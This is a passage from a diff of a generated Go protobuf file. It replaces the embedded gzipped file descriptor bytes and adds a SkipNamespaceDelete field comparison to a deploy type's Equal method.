0xe2, - 0xbb, 0xc1, 0x48, 0x06, 0x58, 0xc6, 0x33, 0x00, 0xfd, 0x18, 0x36, 0xec, 0xd0, 0x13, 0x6b, 0x88, - 0x18, 0xc4, 0x33, 0x21, 0x74, 0xd2, 0x8a, 0xaa, 0x1e, 0x1c, 0xdb, 0xc9, 0x83, 0x63, 0x7b, 0x57, - 0x3f, 0x38, 0x70, 0x63, 0x66, 0x33, 0x90, 0x26, 0xe8, 0x67, 0xb0, 0xce, 0xa9, 0x1f, 0x79, 0x84, - 0x53, 0xeb, 0x39, 0xf1, 0x26, 0x94, 0x35, 0x8b, 0xf2, 0x02, 0xb4, 0xdf, 0x90, 0xc7, 0xed, 0x63, - 0x6d, 0x72, 0x22, 0x2d, 0xf6, 0x02, 0x1e, 0x5f, 0xe0, 0x3a, 0x9f, 0x03, 0x11, 0x86, 0x35, 0x4e, - 0x4e, 0x3d, 0x6a, 0x85, 0x13, 0x1e, 0x4d, 0x38, 0x6b, 0xae, 0x48, 0xbf, 0x1f, 0xbc, 0xd1, 0xaf, - 0x30, 0x38, 0x52, 0x7c, 0xe5, 0xb5, 0xc6, 0x33, 0xd0, 0x66, 0x07, 0xae, 0x2d, 0x59, 0x1a, 0x35, - 0xa0, 0x70, 0x46, 0x2f, 0x74, 0xfe, 0xc4, 0x10, 0x5d, 0x87, 0x15, 0xb9, 0x1b, 0x5d, 0x28, 0xd5, - 0xc7, 0x47, 0xf9, 0x1d, 0x63, 0xf3, 0x14, 0x36, 0xae, 0xac, 0xb2, 0xc4, 0xc1, 0x0f, 0xb2, 0x0e, - 0xaa, 0x0f, 0xde, 0x7d, 0x4d, 0xd4, 0xca, 0xcb, 0x81, 0xcb, 0x78, 0x66, 0x0d, 0x13, 0xc3, 0xb5, - 0x25, 0x0c, 0xf4, 0x10, 0x4a, 0x49, 0x2e, 0x0c, 0x99, 0x8b, 
0x37, 0x7b, 0x55, 0x72, 0xd3, 0x16, - 0xe6, 0x5f, 0x8c, 0x2b, 0x4e, 0xe5, 0xf5, 0x79, 0x04, 0x6b, 0xcc, 0x0d, 0x46, 0x1e, 0xb5, 0xd4, - 0x35, 0xd3, 0x32, 0x78, 0x6f, 0xa1, 0x19, 0x4b, 0x8a, 0xd2, 0xcc, 0xe0, 0xfc, 0x40, 0xd9, 0xef, - 0xe7, 0x70, 0x8d, 0x65, 0x26, 0xd0, 0x4f, 0x61, 0xc3, 0x21, 0x9c, 0x58, 0x5e, 0x28, 0x3b, 0xcd, - 0x24, 0xe0, 0x34, 0xd6, 0x09, 0x58, 0xf0, 0xb7, 0x4b, 0x38, 0x39, 0x08, 0x45, 0xe7, 0x91, 0xa4, - 0xd4, 0xdf, 0xba, 0x33, 0x3f, 0x21, 0xae, 0xbf, 0xda, 0x81, 0x7c, 0xbb, 0x99, 0x7f, 0x30, 0xe0, - 0xc6, 0xd2, 0x58, 0x44, 0x99, 0xe2, 0xae, 0x4f, 0x19, 0x27, 0x7e, 0x24, 0xba, 0x5c, 0x52, 0xcb, - 0x52, 0xb0, 0x17, 0x7a, 0x68, 0x2b, 0x15, 0x93, 0x6c, 0x05, 0xea, 0x70, 0x41, 0x41, 0x87, 0xa2, - 0x21, 0xbc, 0x03, 0x15, 0x79, 0x0c, 0xd2, 0x83, 0xea, 0x1e, 0x65, 0x09, 0x08, 0xeb, 0x5b, 0x50, - 0xe6, 0x64, 0x24, 0xa6, 0xd4, 0x25, 0xaf, 0xe0, 0x12, 0x27, 0xa3, 0x5e, 0xe8, 0x31, 0xf1, 0x42, - 0xba, 0xb1, 0x74, 0x4f, 0xff, 0xa7, 0xb8, 0xee, 0x01, 0x30, 0xfa, 0xcc, 0x72, 0x9d, 0x59, 0x60, - 0xaa, 0x5b, 0x0e, 0xe9, 0xb3, 0xfe, 0x6e, 0x2f, 0xf4, 0x70, 0x99, 0xd1, 0x67, 0x7d, 0x47, 0x38, - 0xfb, 0x04, 0xd6, 0x74, 0xca, 0xb4, 0xac, 0x8b, 0x6f, 0x93, 0x75, 0x4d, 0xf1, 0x95, 0xa4, 0xcd, - 0x7f, 0xe5, 0xe1, 0xfa, 0xb2, 0xda, 0xf5, 0xe6, 0xe7, 0x08, 0xfa, 0x06, 0xac, 0xfb, 0xa2, 0xb4, - 0x5b, 0xaa, 0x67, 0x0a, 0x3d, 0xe8, 0x57, 0x86, 0x84, 0x0f, 0x04, 0xfa, 0x98, 0x5e, 0xa0, 0x7b, - 0xb0, 0x91, 0xe5, 0x29, 0x95, 0xa8, 0x54, 0xaf, 0xcf, 0x98, 0x52, 0x9e, 0xa2, 0x29, 0x44, 0x61, - 0xcc, 0xe5, 0x0e, 0x56, 0xb0, 0x1c, 0x8b, 0xed, 0x31, 0x19, 0x53, 0xb2, 0xbd, 0x95, 0xb7, 0x6e, - 0x4f, 0xf1, 0x75, 0xc5, 0x3a, 0x49, 0x7f, 0x85, 0xc8, 0xd8, 0x9b, 0xab, 0x52, 0x4a, 0x1f, 0xbe, - 0xbd, 0x76, 0xeb, 0x9f, 0x26, 0xe2, 0x3c, 0x74, 0x71, 0xa9, 0xce, 0x4e, 0x88, 0x6d, 0x7e, 0x02, - 0x8d, 0x45, 0xc2, 0xff, 0x52, 0x58, 0xcc, 0x13, 0xa8, 0x66, 0x7e, 0xbe, 0x88, 0x9b, 0x18, 0x4c, - 0x7c, 0x2b, 0x08, 0x1d, 0xaa, 0x5e, 0xa7, 0x2b, 0xb8, 0x1c, 0x4c, 0xfc, 0x43, 0xf1, 0x8d, 0xee, - 0x41, 0x51, 0x4c, 0x68, 0x6d, 0xdd, 0x9c, 0x8f, 0x5d, 0x50, 0xa4, 0xf6, 0x25, 0xc7, 0xfc, 0x00, - 0xca, 0x09, 0x82, 0xde, 0x85, 0x9a, 0x4f, 0xec, 0xb1, 0x1b, 0x50, 0xd9, 0x4d, 0x74, 0x60, 0x55, - 0x8d, 0x1d, 0x8b, 0x06, 0xd3, 0x87, 0x92, 0xfe, 0x2d, 0x84, 0x1e, 0x40, 0x49, 0x35, 0xa3, 0xd7, - 0xfc, 0x54, 0xeb, 0xa8, 0x4e, 0x25, 0xcb, 0x8c, 0x26, 0x3e, 0x2a, 0x96, 0x8d, 0x46, 0xfe, 0x51, - 0xb1, 0x9c, 0x6f, 0x14, 0xcc, 0x5f, 0x1b, 0x00, 0x33, 0x0e, 0x7a, 0x1f, 0x8a, 0xe9, 0xa2, 0xf5, - 0xe5, 0xbe, 0x44, 0x04, 0x58, 0xb2, 0xd0, 0xf7, 0xa0, 0x9c, 0xfc, 0xce, 0x4d, 0xdf, 0x98, 0xaf, - 0x3d, 0xe1, 0x94, 0x9a, 0xbe, 0xf2, 0x0a, 0xb3, 0x57, 0xde, 0xbd, 0x3f, 0xa6, 0x71, 0x08, 0xff, - 0xa8, 0x01, 0xb5, 0xe1, 0x71, 0x07, 0x1f, 0x5b, 0x27, 0xfd, 0xcf, 0xfb, 0x7b, 0xb8, 0x91, 0x43, - 0xd7, 0x60, 0x5d, 0x21, 0x9f, 0x1d, 0xe1, 0xc7, 0x07, 0x47, 0x9d, 0xdd, 0x61, 0xc3, 0x40, 0x9b, - 0x70, 0x53, 0x81, 0x4f, 0xf6, 0x8e, 0x71, 0xbf, 0x67, 0xe1, 0xbd, 0xde, 0x11, 0xde, 0xdd, 0xc3, - 0xc3, 0x46, 0x1e, 0xad, 0x43, 0x75, 0x78, 0x7c, 0x34, 0x48, 0x3c, 0x14, 0x10, 0x82, 0xba, 0x04, - 0x66, 0x0e, 0x8a, 0xe8, 0x16, 0xdc, 0x90, 0xd8, 0x15, 0xfb, 0x15, 0x54, 0x82, 0x02, 0xfe, 0xf4, - 0xb0, 0xb1, 0x8a, 0x00, 0x56, 0xbb, 0x9f, 0xe2, 0xc3, 0xfe, 0x61, 0xa3, 0xd4, 0xed, 0xbe, 0x78, - 0xd9, 0xca, 0x7d, 0xf9, 0xb2, 0x95, 0xfb, 0xea, 0x65, 0xcb, 0xf8, 0xd5, 0xb4, 0x65, 0xfc, 0x69, - 0xda, 0x32, 0xfe, 0x36, 0x6d, 0x19, 0x2f, 0xa6, 0x2d, 0xe3, 0x1f, 0xd3, 0x96, 0xf1, 0xcf, 0x69, - 0x2b, 0xf7, 0xd5, 0xb4, 0x65, 0xfc, 0xee, 0x55, 0x2b, 0xf7, 0xe2, 0x55, 0x2b, 0xf7, 
0xe5, 0xab, - 0x56, 0xee, 0xf3, 0x5a, 0xf6, 0xaf, 0x84, 0xd3, 0x55, 0x99, 0x9b, 0x0f, 0xff, 0x13, 0x00, 0x00, - 0xff, 0xff, 0x11, 0xaf, 0xeb, 0x55, 0x78, 0x10, 0x00, 0x00, + // 1859 bytes of a gzipped FileDescriptorProto + 0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xac, 0x58, 0xcf, 0x73, 0x1b, 0x49, + 0xf5, 0xd7, 0x48, 0xb2, 0x25, 0x3d, 0xc9, 0xb2, 0xdc, 0x8e, 0xf3, 0x55, 0xbc, 0x29, 0x39, 0xab, + 0xad, 0x2f, 0x84, 0xb0, 0x6b, 0x13, 0x2f, 0x3f, 0xcc, 0x66, 0xd9, 0x2a, 0x49, 0x36, 0x58, 0x89, + 0x63, 0x8b, 0x96, 0xd7, 0x0b, 0x5b, 0x54, 0x4d, 0x8d, 0x67, 0xda, 0xf2, 0x94, 0x47, 0x33, 0x93, + 0xe9, 0x56, 0xd6, 0xe6, 0xc4, 0x85, 0xe2, 0x44, 0x15, 0x07, 0xf8, 0x0f, 0x38, 0xec, 0x9f, 0xc0, + 0x9d, 0x03, 0x70, 0xcb, 0x81, 0xc3, 0x9e, 0x5c, 0x44, 0xb9, 0x70, 0xdc, 0xff, 0x00, 0xaa, 0x5f, + 0xf7, 0x8c, 0x46, 0xb2, 0x92, 0x40, 0x15, 0xb7, 0x9e, 0x4f, 0x7f, 0xde, 0xeb, 0xf7, 0x5e, 0xbf, + 0x1f, 0x2d, 0xc1, 0x77, 0x79, 0x64, 0x6f, 0xb1, 0x6d, 0x66, 0x0a, 0xc6, 0xc5, 0x56, 0xc8, 0xa2, + 0x33, 0x53, 0x04, 0x81, 0xb7, 0xc5, 0x2e, 0x43, 0x16, 0xb9, 0x43, 0xe6, 0x8b, 0xf0, 0x34, 0xf5, + 0xb1, 0x19, 0x46, 0x81, 0x08, 0x48, 0x25, 0xbc, 0xdc, 0x4c, 0xb8, 0xeb, 0x8d, 0x41, 0x10, 0x0c, + 0x3c, 0xb6, 0x85, 0x7b, 0xa7, 0xa3, 0xb3, 0x2d, 0x67, 0x14, 0x59, 0xc2, 0x0d, 0x7c, 0xc5, 0x5e, + 0xbf, 0x35, 0x08, 0x06, 0x01, 0x2e, 0xb7, 0xe4, 0x4a, 0xa1, 0xcd, 0x7f, 0x65, 0xa1, 0xba, 0x97, + 0x28, 0xee, 0x87, 0xcc, 0x26, 0x8f, 0xa0, 0xfc, 0xdc, 0xfd, 0xa5, 0xcb, 0x22, 0x93, 0x87, 0xcc, + 0xae, 0x1b, 0xf7, 0x8c, 0xfb, 0xe5, 0xed, 0xf5, 0xcd, 0xf4, 0x61, 0x9b, 0x9f, 0x05, 0xd1, 0x85, + 0x17, 0x58, 0x8e, 0x14, 0xa0, 0xa0, 0xe8, 0x28, 0xdc, 0x82, 0xea, 0x17, 0x7a, 0x0f, 0xc5, 0x79, + 0x3d, 0x7b, 0x2f, 0xf7, 0x16, 0xf9, 0xa5, 0x2f, 0x52, 0x5f, 0x9c, 0x3c, 0x82, 0xca, 0x90, 0x89, + 0xc8, 0xb5, 0xb5, 0x82, 0x1c, 0x2a, 0xa8, 0x4f, 0x2b, 0x78, 0x8a, 0x0c, 0x14, 0x2f, 0x0f, 0x93, + 0x35, 0x27, 0x1f, 0x43, 0xc5, 0xf6, 0x46, 0x5c, 0xc4, 0xd6, 0xe7, 0xd1, 0xfa, 0x3b, 0xd3, 0xc2, + 0x1d, 0xc5, 0x50, 0xd2, 0xf6, 0xe4, 0x83, 0x7c, 0x07, 0x8a, 0xd1, 0xc8, 0x57, 0x92, 0x0b, 0x28, + 0xb9, 0x36, 0x2d, 0x49, 0x47, 0x3e, 0x4a, 0x15, 0x22, 0xb5, 0x20, 0xef, 0x03, 0xd8, 0xc1, 0x70, + 0xe8, 0x0a, 0x93, 0x9f, 0x5b, 0xf5, 0xc5, 0x7b, 0xc6, 0xfd, 0x52, 0x7b, 0x69, 0x7c, 0xbd, 0x51, + 0xea, 0x20, 0xda, 0xdf, 0x6f, 0xd1, 0x92, 0x22, 0xf4, 0xcf, 0x2d, 0x42, 0x20, 0x2f, 0xac, 0x01, + 0xaf, 0x17, 0xee, 0xe5, 0xee, 0x97, 0x28, 0xae, 0x9b, 0x7f, 0x31, 0xa0, 0x92, 0x0e, 0x87, 0x24, + 0xf9, 0xd6, 0x90, 0x61, 0xe0, 0x4b, 0x14, 0xd7, 0x32, 0x26, 0x0e, 0x0b, 0xbd, 0xe0, 0xca, 0xe4, + 0x82, 0x85, 0x71, 0x50, 0x67, 0x62, 0xb2, 0x8b, 0x8c, 0xbe, 0x60, 0x21, 0x2d, 0x3b, 0xc9, 0x9a, + 0x93, 0x1f, 0x41, 0xe5, 0x9c, 0x59, 0x9e, 0x38, 0xb7, 0xcf, 0x99, 0x7d, 0x11, 0x07, 0x74, 0x26, + 0x26, 0xfb, 0xc8, 0xe8, 0x48, 0x06, 0x9d, 0xa2, 0x93, 0x6f, 0xc2, 0xb2, 0x65, 0xcb, 0x44, 0x32, + 0x39, 0xf3, 0x98, 0x2d, 0x82, 0x08, 0xa3, 0x5a, 0xa2, 0x55, 0x05, 0xf7, 0x35, 0xda, 0xfc, 0x9b, + 0x01, 0x30, 0xb1, 0x81, 0x74, 0xa0, 0x1c, 0x46, 0x2c, 0x62, 0xbe, 0xc3, 0x22, 0xe6, 0xe8, 0x3c, + 0xda, 0x98, 0x3e, 0xb5, 0x37, 0x21, 0x28, 0xc9, 0xfd, 0x0c, 0x4d, 0x4b, 0x91, 0x8f, 0xa0, 0xc8, + 0x2f, 0xac, 0xb3, 0xb3, 0xc0, 0x73, 0xea, 0x59, 0xd4, 0x70, 0x77, 0x5a, 0x43, 0x5f, 0xef, 0x26, + 0xe2, 0x09, 0x9f, 0x7c, 0x1b, 0xb2, 0xe1, 0x65, 0x3d, 0x37, 0x2f, 0x03, 0x7a, 0x97, 0x9d, 0x83, + 0x6e, 0x22, 0x92, 0x0d, 0x2f, 0xdb, 0x4b, 0xa0, 0x63, 0x66, 0x8a, 0xab, 0x90, 0x35, 0x7f, 0x6f, + 0x40, 0x39, 0x15, 0x12, 0xf2, 0x31, 0xe4, 0x2e, 0x76, 0xf8, 0x7c, 0x27, 0x9e, 0xec, 0xf4, 0x7b, + 
0x81, 0xc3, 0x29, 0xb3, 0x9c, 0x2b, 0x64, 0xb7, 0x0b, 0xe3, 0xeb, 0x8d, 0xdc, 0x93, 0x9d, 0xfe, + 0x7e, 0x86, 0x4a, 0x31, 0xf2, 0x43, 0xc8, 0x85, 0x97, 0xde, 0x7c, 0x07, 0x7a, 0x97, 0x07, 0xa9, + 0x83, 0x94, 0xa8, 0xc4, 0x32, 0x54, 0xca, 0xb4, 0x2b, 0x00, 0x78, 0x0f, 0xca, 0xac, 0x87, 0xb0, + 0x72, 0xe3, 0x34, 0x72, 0x17, 0x4a, 0x32, 0x49, 0x78, 0x68, 0xd9, 0x71, 0xd6, 0x4c, 0x80, 0xe6, + 0x11, 0x54, 0xa7, 0x8f, 0x20, 0xb7, 0x61, 0x91, 0xdb, 0x91, 0x1b, 0x0a, 0x4d, 0xd6, 0x5f, 0xe4, + 0xff, 0xa1, 0xca, 0x47, 0xb6, 0xcd, 0x38, 0x37, 0xed, 0xc0, 0x1b, 0x0d, 0x7d, 0x34, 0xb8, 0x44, + 0x97, 0x34, 0xda, 0x41, 0xb0, 0xf9, 0x0b, 0x28, 0xf5, 0x2c, 0x61, 0x9f, 0x63, 0xb2, 0xde, 0x85, + 0xfc, 0x95, 0x35, 0xf4, 0x94, 0xa6, 0x76, 0x71, 0x7c, 0xbd, 0x91, 0xff, 0x79, 0xeb, 0xe9, 0x01, + 0x45, 0x94, 0x3c, 0x84, 0x45, 0x61, 0x45, 0x03, 0x26, 0xb4, 0xeb, 0xb3, 0xb7, 0x20, 0xd5, 0x1c, + 0x23, 0x81, 0x6a, 0x62, 0xf3, 0x37, 0x59, 0x28, 0xa7, 0x70, 0xf2, 0x2d, 0x28, 0x59, 0xa1, 0x6b, + 0x0e, 0xa2, 0x60, 0x14, 0xea, 0x53, 0x2a, 0xe3, 0xeb, 0x8d, 0x62, 0xab, 0xd7, 0xfd, 0x89, 0xc4, + 0x68, 0xd1, 0x0a, 0x5d, 0x5c, 0x91, 0x2d, 0x28, 0x4b, 0xea, 0x73, 0x16, 0x71, 0x37, 0xd0, 0xc6, + 0xb7, 0xab, 0xe3, 0xeb, 0x0d, 0x68, 0xf5, 0xba, 0x27, 0x0a, 0xa5, 0x60, 0x85, 0xae, 0x5e, 0xcb, + 0x4a, 0xbb, 0x70, 0x7d, 0x07, 0x53, 0xa4, 0x44, 0x71, 0x9d, 0x54, 0x5f, 0x3e, 0x55, 0x7d, 0x53, + 0x01, 0x5e, 0x98, 0x09, 0xb0, 0x0c, 0x9b, 0x67, 0x9d, 0x32, 0x6f, 0x52, 0x1e, 0x8b, 0x2a, 0x6c, + 0x88, 0xc6, 0xd5, 0x41, 0xb6, 0x60, 0xd5, 0xf2, 0xfd, 0x40, 0x58, 0xd3, 0xa5, 0x54, 0x40, 0x2e, + 0x99, 0x6c, 0x25, 0xe5, 0xf4, 0xa5, 0x01, 0x2b, 0x37, 0xea, 0x43, 0x36, 0x1c, 0x19, 0x5a, 0x33, + 0xb4, 0xc4, 0xb9, 0xcc, 0xc7, 0x5c, 0xdc, 0x70, 0x64, 0xd8, 0x7b, 0x12, 0xa4, 0x25, 0x49, 0xc0, + 0x25, 0x79, 0x08, 0x85, 0x50, 0x06, 0x93, 0xc5, 0x2d, 0xe3, 0xff, 0xe6, 0xdc, 0x80, 0xea, 0x68, + 0x9a, 0x47, 0xb6, 0x61, 0x8d, 0x5f, 0xb8, 0xa1, 0x99, 0x38, 0x68, 0x3a, 0xcc, 0x63, 0x82, 0x61, + 0x94, 0x8a, 0x74, 0x55, 0x6e, 0x1e, 0xc6, 0x7b, 0xbb, 0xb8, 0xd5, 0xfc, 0xad, 0x01, 0xd5, 0xe9, + 0x42, 0x24, 0xef, 0xc1, 0x52, 0x5c, 0x88, 0x68, 0xab, 0xce, 0xb5, 0x4a, 0x0c, 0x4a, 0xfb, 0xa6, + 0x48, 0x56, 0x34, 0x50, 0x46, 0xa6, 0x48, 0xad, 0x68, 0x30, 0xe5, 0x43, 0xee, 0x3f, 0xf3, 0xa1, + 0x79, 0x05, 0xe5, 0x54, 0x85, 0xcb, 0x3b, 0x45, 0xed, 0x86, 0x6a, 0xbb, 0x72, 0x4d, 0x1a, 0x00, + 0x89, 0x87, 0xf1, 0xb9, 0x29, 0x84, 0x7c, 0x1f, 0xaa, 0x9c, 0x09, 0x33, 0x1e, 0x26, 0xae, 0xca, + 0x92, 0x62, 0xbb, 0x36, 0xbe, 0xde, 0xa8, 0xf4, 0x99, 0xd0, 0x33, 0xa4, 0xbb, 0x4b, 0x2b, 0x7c, + 0xf2, 0xe5, 0x34, 0xff, 0x64, 0x00, 0x4c, 0x86, 0x13, 0xd9, 0x51, 0x95, 0xaf, 0xfa, 0xc6, 0x3b, + 0x37, 0x2a, 0xbf, 0x8f, 0x95, 0x27, 0x99, 0xb3, 0x85, 0x4f, 0x76, 0x20, 0x1f, 0x46, 0xc1, 0x50, + 0x57, 0x4e, 0x73, 0xb6, 0x6f, 0x06, 0x43, 0x26, 0xce, 0xd9, 0x88, 0xf7, 0xed, 0xc8, 0x0a, 0x99, + 0xd4, 0xb0, 0x9f, 0xa1, 0x28, 0x31, 0xaf, 0x61, 0x3b, 0xf3, 0x1a, 0xb6, 0xec, 0x79, 0x7a, 0xd2, + 0x62, 0x73, 0x19, 0xe7, 0x60, 0x69, 0xca, 0xa6, 0xd7, 0x76, 0x8a, 0xbb, 0x50, 0xe2, 0x22, 0x62, + 0xd6, 0xd0, 0xf5, 0x07, 0x68, 0x60, 0x91, 0x4e, 0x00, 0xf2, 0x63, 0x58, 0xb1, 0x03, 0x4f, 0x9e, + 0x21, 0x6d, 0x90, 0x6f, 0x8b, 0xc0, 0x49, 0xda, 0xb0, 0x7a, 0xa5, 0x6c, 0xc6, 0xaf, 0x94, 0xcd, + 0x5d, 0xfd, 0x4a, 0xa1, 0xb5, 0x89, 0x4c, 0x0f, 0x45, 0xc8, 0xcf, 0x60, 0x59, 0xb0, 0x61, 0xe8, + 0x59, 0x82, 0x99, 0xcf, 0x2d, 0x6f, 0xc4, 0x78, 0x3d, 0x8f, 0x09, 0xb0, 0xf5, 0x86, 0x38, 0x6e, + 0x1e, 0x6b, 0x91, 0x13, 0x94, 0xd8, 0xf3, 0x45, 0x74, 0x45, 0xab, 0x62, 0x0a, 0x24, 0x14, 0x96, + 0x84, 0x75, 0xea, 0x31, 
0x33, 0x18, 0x89, 0x70, 0x24, 0x78, 0x7d, 0x01, 0xf5, 0x7e, 0xf0, 0x46, + 0xbd, 0x52, 0xe0, 0x48, 0xf1, 0x95, 0xd6, 0x8a, 0x48, 0x41, 0xeb, 0x2d, 0x58, 0x9d, 0x73, 0x34, + 0xa9, 0x41, 0xee, 0x82, 0x5d, 0xe9, 0xf8, 0xc9, 0x25, 0xb9, 0x05, 0x0b, 0xe8, 0x8d, 0xee, 0xae, + 0xea, 0xe3, 0xa3, 0xec, 0x8e, 0xb1, 0x7e, 0x0a, 0x2b, 0x37, 0x4e, 0x99, 0xa3, 0xe0, 0x07, 0x69, + 0x05, 0xe5, 0xed, 0x77, 0x5f, 0x63, 0xb5, 0xd2, 0x72, 0xe0, 0x72, 0x91, 0x3a, 0xa3, 0x49, 0x61, + 0x75, 0x0e, 0x83, 0x3c, 0x82, 0x42, 0x1c, 0x0b, 0x03, 0x63, 0xf1, 0x66, 0xad, 0xaa, 0xdc, 0xb4, + 0x44, 0xf3, 0xcf, 0xc6, 0x0d, 0xa5, 0x98, 0x3e, 0x8f, 0x61, 0x89, 0xbb, 0xfe, 0xc0, 0x63, 0xa6, + 0x4a, 0x33, 0x5d, 0x06, 0xef, 0xcd, 0x4c, 0x70, 0xa4, 0xa8, 0x9a, 0xe9, 0x5d, 0x1e, 0x28, 0xf9, + 0xfd, 0x0c, 0xad, 0xf0, 0xd4, 0x06, 0xf9, 0x29, 0xac, 0x38, 0x96, 0xb0, 0x4c, 0x2f, 0xc0, 0xf1, + 0x34, 0xf2, 0x05, 0x8b, 0x74, 0x00, 0x66, 0xf4, 0xed, 0x5a, 0xc2, 0x3a, 0x08, 0xe4, 0xb8, 0x42, + 0x52, 0xa2, 0x6f, 0xd9, 0x99, 0xde, 0x90, 0xe9, 0xaf, 0x3c, 0xc0, 0x07, 0x5f, 0xf3, 0x0f, 0x06, + 0xac, 0xcd, 0xb5, 0x45, 0xb6, 0x29, 0xe1, 0x0e, 0x19, 0x17, 0xd6, 0x30, 0x94, 0xa3, 0x31, 0xee, + 0x65, 0x09, 0xd8, 0x09, 0x3c, 0xb2, 0x91, 0x14, 0x13, 0xce, 0x0f, 0x75, 0xb9, 0xa0, 0x20, 0xd9, + 0x2f, 0xc9, 0x3b, 0x50, 0xc2, 0x6b, 0x40, 0x0d, 0x6a, 0xe4, 0x14, 0x11, 0x90, 0xd2, 0x77, 0xa0, + 0x28, 0xac, 0x81, 0xdc, 0x52, 0x49, 0x5e, 0xa2, 0x05, 0x61, 0x0d, 0x3a, 0x81, 0xc7, 0xe5, 0xb3, + 0x6a, 0x6d, 0xae, 0x4f, 0xff, 0x23, 0xbb, 0x1e, 0x00, 0x70, 0xf6, 0xcc, 0x74, 0x9d, 0x89, 0x61, + 0x6a, 0xc4, 0xf6, 0xd9, 0xb3, 0xee, 0x6e, 0x27, 0xf0, 0x68, 0x91, 0xb3, 0x67, 0x5d, 0x47, 0x2a, + 0xfb, 0x04, 0x96, 0x74, 0xc8, 0x74, 0x59, 0xe7, 0xdf, 0x56, 0xd6, 0x15, 0xc5, 0x57, 0x25, 0xdd, + 0xfc, 0x7b, 0x0e, 0x6e, 0xcd, 0xeb, 0x5d, 0x6f, 0x7e, 0xc3, 0x90, 0x6f, 0xc0, 0xf2, 0x50, 0xb6, + 0x76, 0x53, 0x0d, 0x5a, 0x59, 0x0f, 0xfa, 0x69, 0x82, 0xf0, 0x81, 0x44, 0x9f, 0xb0, 0x2b, 0xf2, + 0x00, 0x56, 0xd2, 0x3c, 0x55, 0x25, 0x2a, 0xd4, 0xcb, 0x13, 0x26, 0x96, 0xa7, 0x1c, 0x0a, 0x61, + 0x10, 0x09, 0xf4, 0x60, 0x81, 0xe2, 0x5a, 0xba, 0xc7, 0xd1, 0xa6, 0xd8, 0xbd, 0x85, 0xb7, 0xba, + 0xa7, 0xf8, 0xba, 0x63, 0x9d, 0x24, 0x3f, 0x5d, 0xd0, 0xf6, 0xfa, 0x22, 0x96, 0xd2, 0x87, 0x6f, + 0xef, 0xdd, 0xfa, 0xf7, 0x0c, 0xce, 0x55, 0xd5, 0x5c, 0xca, 0x93, 0x1b, 0xc2, 0x27, 0xf8, 0xc5, + 0xe8, 0x94, 0xd9, 0x81, 0x7f, 0xe6, 0x0e, 0xd4, 0x38, 0x55, 0xef, 0x86, 0xea, 0x04, 0xc6, 0x81, + 0xfa, 0x2e, 0x54, 0x24, 0x62, 0xda, 0x81, 0x2f, 0xd8, 0xa5, 0xa8, 0x17, 0x91, 0x55, 0x96, 0x58, + 0x47, 0x41, 0xc9, 0x03, 0xa7, 0x34, 0x79, 0xe0, 0xac, 0x7f, 0x02, 0xb5, 0x59, 0x03, 0xfe, 0x9b, + 0xc6, 0xd5, 0x3c, 0x81, 0x72, 0xea, 0x37, 0x95, 0xcc, 0x74, 0x7f, 0x34, 0x34, 0xfd, 0xc0, 0x61, + 0xea, 0xc9, 0xbc, 0x40, 0x8b, 0xfe, 0x68, 0x78, 0x28, 0xbf, 0xc9, 0x03, 0xc8, 0xcb, 0x0d, 0x5d, + 0xbb, 0xb7, 0xa7, 0x63, 0x23, 0x29, 0xd8, 0x5b, 0x90, 0xd3, 0xfc, 0x00, 0x8a, 0x31, 0x22, 0x5d, + 0x1b, 0x5a, 0xf6, 0xb9, 0xeb, 0x33, 0x9c, 0x56, 0xda, 0xb0, 0xb2, 0xc6, 0x8e, 0xe5, 0x00, 0xeb, + 0x42, 0x41, 0xff, 0x40, 0x23, 0xdb, 0x50, 0x50, 0xc3, 0xee, 0x35, 0xbf, 0x1f, 0x5b, 0x6a, 0x12, + 0x62, 0x1b, 0xd3, 0xc4, 0xc7, 0xf9, 0xa2, 0x51, 0xcb, 0x3e, 0xce, 0x17, 0xb3, 0xb5, 0x5c, 0xf3, + 0xd7, 0x06, 0xc0, 0x84, 0x43, 0xde, 0x87, 0x7c, 0x72, 0x68, 0x75, 0xbe, 0x2e, 0x69, 0x01, 0x45, + 0x16, 0xf9, 0x1e, 0x14, 0xe3, 0x1f, 0xdf, 0xc9, 0xc3, 0xf7, 0xb5, 0x19, 0x94, 0x50, 0x93, 0x9b, + 0xc9, 0x4d, 0x6e, 0xe6, 0xc1, 0x1f, 0x13, 0x3b, 0xa4, 0x7e, 0x52, 0x83, 0x4a, 0xff, 0xb8, 0x45, + 0x8f, 0xcd, 0x93, 0xee, 0xe7, 0xdd, 0x3d, 0x5a, 
0xcb, 0x90, 0x55, 0x58, 0x56, 0xc8, 0x67, 0x47, + 0xf4, 0xc9, 0xc1, 0x51, 0x6b, 0xb7, 0x5f, 0x33, 0xc8, 0x3a, 0xdc, 0x56, 0xe0, 0xd3, 0xbd, 0x63, + 0xda, 0xed, 0x98, 0x74, 0xaf, 0x73, 0x44, 0x77, 0xf7, 0x68, 0xbf, 0x96, 0x25, 0xcb, 0x50, 0xee, + 0x1f, 0x1f, 0xf5, 0x62, 0x0d, 0x39, 0x42, 0xa0, 0x8a, 0xc0, 0x44, 0x41, 0x9e, 0xdc, 0x81, 0x35, + 0xc4, 0x6e, 0xc8, 0x2f, 0x90, 0x02, 0xe4, 0xe8, 0xa7, 0x87, 0xb5, 0x45, 0x02, 0xb0, 0xd8, 0xfe, + 0x94, 0x1e, 0x76, 0x0f, 0x6b, 0x85, 0x76, 0xfb, 0xc5, 0xcb, 0x46, 0xe6, 0xab, 0x97, 0x8d, 0xcc, + 0xd7, 0x2f, 0x1b, 0xc6, 0xaf, 0xc6, 0x0d, 0xe3, 0xcb, 0x71, 0xc3, 0xf8, 0xeb, 0xb8, 0x61, 0xbc, + 0x18, 0x37, 0x8c, 0x7f, 0x8c, 0x1b, 0xc6, 0x3f, 0xc7, 0x8d, 0xcc, 0xd7, 0xe3, 0x86, 0xf1, 0xbb, + 0x57, 0x8d, 0xcc, 0x8b, 0x57, 0x8d, 0xcc, 0x57, 0xaf, 0x1a, 0x99, 0xcf, 0x2b, 0xe9, 0xff, 0x37, + 0x4e, 0x17, 0x31, 0x36, 0x1f, 0xfe, 0x3b, 0x00, 0x00, 0xff, 0xff, 0x2f, 0xd3, 0xa2, 0xe8, 0x0d, + 0x11, 0x00, 0x00, } func (x ActionType) String() string { @@ -2117,6 +2154,9 @@ func (this *PrerenderedDeploy) Equal(that interface{}) bool { return false } } + if this.SkipNamespaceDelete != that1.SkipNamespaceDelete { + return false + } return true } func (this *SkaffoldDeploy) Equal(that interface{}) bool { @@ -2546,6 +2586,15 @@ func (this *PrometheusScrapeSpec) Equal(that 